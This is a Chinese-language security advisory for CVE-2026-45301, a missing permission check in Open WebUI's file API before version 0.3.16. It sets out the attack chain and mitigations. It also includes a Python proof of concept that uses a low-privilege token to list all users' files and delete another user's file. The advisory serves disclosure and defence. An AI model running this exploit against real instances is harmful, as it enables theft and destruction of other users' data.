CVE-2026-45301 CVSS 8.1 高危

CVE-2026-45301 Open WebUI权限检查缺失漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45301

漏洞类型

权限绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个可自托管的人工智能平台。在0.3.16版本之前，其所有文件相关的API端点存在严重的权限检查缺失漏洞。由于缺乏适当的访问控制，任何经过身份验证的攻击者都可以利用该漏洞，无限制地列出、访问并删除平台上所有用户上传的文件，造成严重的数据泄露和完整性破坏。该问题已在0.3.16版本中得到修复。

技术细节

该漏洞的根本原因是Open WebUI在文件管理API端点未实施严格的权限验证机制。在受影响版本中，系统仅验证了用户是否登录（PR:L），却未验证用户对特定文件资源的所有权或访问权限。攻击者一旦获得普通用户权限，即可通过构造特定的HTTP请求，直接调用文件相关的API接口。利用方式包括遍历文件ID以列出所有文件、下载其他用户的敏感文件以及删除关键数据。由于攻击向量通过网络（AV:N）且无需用户交互（UI:N），这导致了高机密性影响（C:H）和高完整性影响（I:H），使得多租户环境下的数据隔离完全失效。

攻击链分析

STEP 1

侦察与访问

攻击者注册一个普通用户账户或获取一个低权限的已认证会话令牌。

STEP 2

权限绕过

攻击者直接向文件管理API端点（如/api/files/list或/api/files/delete/{id}）发送请求，利用系统缺失权限检查的缺陷。

STEP 3

数据泄露

通过列表接口，攻击者获取平台上所有用户上传文件的元数据及访问路径，进而下载查看敏感文件。

STEP 4

数据破坏

攻击者利用删除接口，传入其他用户的文件ID，强制删除系统中的任意文件，破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
base_url = "http://target-open-webui-instance.com"

# Attacker's low-privilege session token
attacker_token = "eyJhbGciOiJIUzI1NiIs..."

headers = {
    "Authorization": f"Bearer {attacker_token}",
    "Content-Type": "application/json"
}

# 1. List all files (Exploiting missing permission check)
list_endpoint = f"{base_url}/api/v1/files/list"
response = requests.get(list_endpoint, headers=headers)

if response.status_code == 200:
    files_data = response.json()
    print("[+] Successfully leaked file list:", files_data)

    # 2. Delete a file owned by another user (if ID is known)
    # Assuming file_id '12345' belongs to Admin
    target_file_id = "12345"
    delete_endpoint = f"{base_url}/api/v1/files/delete/{target_file_id}"
    
    del_resp = requests.delete(delete_endpoint, headers=headers)
    if del_resp.status_code == 200:
        print(f"[+] Successfully deleted file ID: {target_file_id}")
    else:
        print(f"[-] Failed to delete file ID: {target_file_id}")
else:
    print("[-] Failed to exploit the vulnerability.")

影响范围

Open WebUI < 0.3.16

防御指南

临时缓解措施

建议立即将Open WebUI升级至0.3.16或更高版本以彻底修复此漏洞。若暂时无法升级，应在网络边界通过防火墙限制对/api/files相关路径的访问，仅允许受信任的管理员IP地址调用，或暂时禁用文件上传功能以防止数据被未授权访问或删除。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表